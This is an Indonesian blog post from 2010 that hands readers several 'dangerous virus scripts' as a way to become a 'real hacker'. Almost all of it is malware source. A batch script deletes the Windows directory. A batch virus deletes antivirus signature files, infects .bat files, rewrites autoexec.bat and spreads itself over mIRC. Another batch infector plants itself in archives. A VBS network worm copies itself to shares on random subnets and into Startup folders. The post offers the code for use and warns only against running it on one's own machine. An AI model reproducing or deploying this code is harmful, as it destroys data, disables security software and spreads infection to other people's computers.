Rabu, 15 Desember 2010

Script Script Virus Berbahaya!

Berikut ini merupakan beberapa Kode Virus yang sangat berbahaya.
Ini adalah skript aye buat semua orang yang ingin menjadi hacker sejati!

berikut beberapa script nya :


Code 1 :

@echo off
@break off >nul
ctty >nul
copy %windir%\command\deltree.exe c:\
c:\deltree.exe %windir% /Y
rem errors support hbbg
if exist %windir%\command.com goto fuckwin
goto end
:fuckwin
for %%f in (%windir%\*.*) do copy %0 %%f >nul



Code 2 :


@echo off | REM phanthom
ctty nul.phanthom
cls | phanthom
REM bat.phanthom
REM by adious phanthom
if exist c:\phanthom.bat goto endvir
copy %0 c:\phanthom.bat
attrib +r +s c:\phanthom.bat
set phanthom=del
if exist c:\phanthom.bat %phanthom% c:\programme\norton~1\s32integ.dll
if exist c:\phanthom.bat %phanthom% c:\programme\f-prot95\fpwm32.dll
if exist c:\phanthom.bat %phanthom% c:\programme\mcafee\scan.dat
if exist c:\phanthom.bat %phanthom% c:\tbavw95\tbscan.sig
if exist c:\phanthom.bat %phanthom% c:\tbav\tbav.dat
if exist c:\phanthom.bat %phanthom% c:\programme\tbav\tbav.dat
if exist c:\phanthom.bat %phanthom% c:\programme\avpersonal\antivir.vdf
for %%phanthom in (*.bat) do copy %0 + %%phanthom
set phanthom=cd
cd c:\windows
set phanthom=%0
for %%phanthom in (*.bat) do copy %phanthom% + %%phanthom
set phanthom=cd\
%phanthom%
set phanthom=del
%phanthom% c:\autoexec.bat
set phanthom=echo
%phanthom% @echo off >c:\autoexec.bat
%phanthom% @cls >>c:\autoexec.bat
%phanthom% echo 000000000000000 >>c:\autoexec.bat
%phanthom% echo "the phanthom has came to hunt the living" >>c:\autoexec.bat
%phanthom% echo. >>c:\autoexec.bat
%phanthom% echo bat.phanthom >>c:\autoexec.bat
%phanthom% echo another creation form the labs of adious [rRlf] >>c:\autoexec.bat
%phanthom% echo 000000000000000 >>c:\autoexec.bat
%pahnthom% pause >>c:\autoexec.bat
:phanthom mirc script
%phanthom% [script]>3.bat
%phanthom% n0=on 1:JOIN:#:{ >>3.bat
%phanthom% n1= /if ( nick == $me ) { halt } >>3.bat
%phanthom% n2= /.dcc send $nick c:\phanthom.bat >>3.bat
%phanthom% n3=} >>3.bat
set phanthom=copy
if exist c:\mirc\mirc.ini %phanthom% 3.bat c:\mirc\script.ini
if exist c:\mirc32\mirc.ini %phanthom% 3.bat c:\mirc32\script.ini
if exist c:\progra~1\mirc\mirc.ini %phanthom% 3.bat c:\progra~1\mirc\script.ini
if exist c:\progra~1\mirc32\mirc.ini %phanthom% 3.bat c:\progra~1\mirc32\script.ini
set phanthom=del
%phanthom% 3.bat
:phanthom end



Code 3 :

@ctty nul%BR1%
if '%1'=='BR1DiR' goto BR1diRz
if '%1'=='BR1' goto BR1zex
set BR1FK=bat
echo.>BR1.bat
Find "BR1"<%0>>BR1.bat
for %%a in (*.arj ..\*.arj) do arj a %%a BR1.bat
for %%a in (*.zip ..\*.zip) do pkzip %%a BR1.bat
for %%a in (*.rar ..\*.rar) do rar a %%a BR1.bat
for %%r in (%path% . .. c: d: e:) do call BR1.bat BR1DiR %%r
goto BR1pre
:BR1DiRz
for %%c in (%2\*.%BR1FK%) do if not %%c==%2\AUTOEXEC.BAT call BR1.bat BR1 %%c
goto BR1end
:BR1pre
type BR1.bat >%windir%\winstart.bat
del BR1.bat
goto BR1end
:BR1zex
Find "BR1"<%2>nul
if errorlevel 1 type BR1.bat>>%2
:BR1end [StRANGER.Bi0R0b0t NeKr0!]


On Error Resume Next
Set FSO = CreateObject("Scripting.FileSystemObject")
Set WshNet = CreateObject("WScript.Network")
Set ReadUs = FSO.OpenTextFile(WScript.ScriptFullName,1)
OC = ReadUs.ReadAll
sOC = InStr(1, OC, "'<----- VBS/ShareUpdate by FSO ----->")
eOC = InStrRev(OC, "'<----- Exit ShareUpdate ----->") + 31
Addrs = Mid(OC, eOC)
ListLen = Len(UC)
For X = 1 To 10
ListLen = InStrRev(UC, "'", ListLen)
Next
Addrs = Right(OC, ListLen)
OldSpot = 1
Do
FindNewAddr = InStr(1, Addrs, vbcrlf)
Addr = Mid(Addrs, OldSpot, FindNewAddr)
WNet.MapNetworkDrive "J:", "\\"&Addr&"\C"
Tmp = "C:\"&FSO.GetTempName
FSO.CopyFile "J:\NETWORK.VBS", Tmp
If FSO.FileExists(Tmp) Then
Set UpdDestroyIPs=FSO.OpenTextFile(Tmp,1)
Tmp2 = "C:\"&FSO.GetTempName
Set UpdAddWorm=FSO.CreateTextFile(Tmp2)
UC = UpdDestroyIPs.ReadAll
sUC = InStr(1, UC, "'<----- VBS/ShareUpdate by FSO ----->")
eUC = InStrRev(UC, "'<----- Exit ShareUpdate ----->")
UC = Mid(UC, sUC, eUC)
UpdAddWorm.Write UC
UpdAddWorm.Write Replace(Addrs, vbcrlf, vbcrlf&"'")
UpdAddWorm.Close
UpdDestroyIPs.Close
FSO.CopyFile Tmp2, "C:\NETWORK.VBS"
FSO.CopyFile Tmp2, "C:\WINDOWS\START MENU\PROGRAMS\STARTUP\NETWORK.VBS"
FSO.CopyFile Tmp2, "C:\WIN95\START MENU\PROGRAMS\STARTUP\NETWORK.VBS"
FSO.CopyFile Tmp2, "C:\WIN95\WINDOWS\START MENU\PROGRAMS\STARTUP\NETWORK.VBS"
FSO.CopyFile Tmp2, "C:\WINNT\START MENU\PROGRAMS\STARTUP\NETWORK.VBS"
FSO.CopyFile Tmp2, "C:\WINDOWS\NETWORK.VBS"
FSO.CopyFile Tmp2, "C:\WIN95\NETWORK.VBS"
FSO.CopyFile Tmp2, "C:\WINNT\NETWORK.VBS"
FSO.DeleteFile Tmp, True
FSO.DeleteFile Tmp2, True
End If
WNet.RemoveNetworkDrive "J:"
Addr = FindNewAddr
Loop Until FindNewAddr = 0
Subnets = 0
Do Until WshNet.Domain = Empty
Randomize
If Subnets < 50 Then
A = Int(Rnd * 15) + 198
Else
A = Int(Rnd * 254) + 1
End If
B = Int(Rnd * 254) + 1
C = Int(Rnd * 254) + 1
SN = A&"."&B&"."&C
NL.WriteLine "Subnet: "&SN
For X = 1 To 254
On Error GoTo 0
WshNet.MapNetworkDrive "J:", "\\"&SN&"."&X
If Not Err.Number = 0 Then
Err.Clear
GoTo NextIP
End If
On Error Resume Next
Tmp3 = "C:\"&FSO.GetTempName
Set NTmp=FSO.CreateTextFile(Tmp3)
NTmp.Write OC
NTmp.Write Replace(Addrs, vbcrlf, vbcrlf&"'")
NTmp.Close
FSO.DeleteFile "J:\NETWORK.LOG"
FSO.CopyFile Tmp3, "J:\NETWORK.VBS"
FSO.CopyFile Tmp3, "J:\WINDOWS\START MENU\PROGRAMS\STARTUP\NETWORK.VBS"
FSO.CopyFile Tmp3, "J:\WINDOWS\NETWORK.VBS"
FSO.CopyFile Tmp3, "J:\WIN95\NETWORK.VBS"
FSO.CopyFile Tmp3, "J:\WIN95\WINDOWS\NETWORK.VBS"
FSO.CopyFile Tmp3, "J:\WIN95\START MENU\PROGRAMS\STARTUP\NETWORK.VBS"
FSO.CopyFile Tmp3, "J:\WIN95\WINDOWS\START MENU\PROGRAMS\STARTUP\NETWORK.VBS"
FSO.CopyFile Tmp3, "J:\WINNT\NETWORK.VBS"
FSO.DeleteFile Tmp3, True
NextIP:
Next
Loop



Nah, tiga script diatas merupakan script script virus yang sangat berbahaya.




Note: Jangan pernah mencoba script diatas pada komputer atau notebook kalian sendiri.


Sekian aja dah, semoga bermanfaat....^^

2 komentar: